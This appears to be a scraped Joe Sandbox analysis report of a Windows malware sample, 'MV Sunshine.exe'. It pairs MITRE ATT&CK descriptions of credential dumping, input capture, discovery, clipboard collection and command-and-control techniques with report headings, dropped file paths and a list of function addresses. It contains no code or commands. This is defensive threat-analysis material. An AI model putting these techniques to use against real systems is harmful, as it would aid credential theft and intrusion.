Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report MV Sunshine.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\122-fVJ8

C:\Users\user\AppData\Local\Temp\autC552.tmp

C:\Users\user\AppData\Local\Temp\autC582.tmp

C:\Users\user\AppData\Local\Temp\bohmite

C:\Users\user\AppData\Local\Temp\croc

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
MV Sunshine.exe

Function 00623B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Function 00624FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Function 00624AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 006893DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00623015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 74
windowregistryCOMMON

Function 00623041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 006271EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00623633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowtimeregistryCOMMON

Function 00623A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00623778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267
COMMON

Function 0062F8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168
comCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre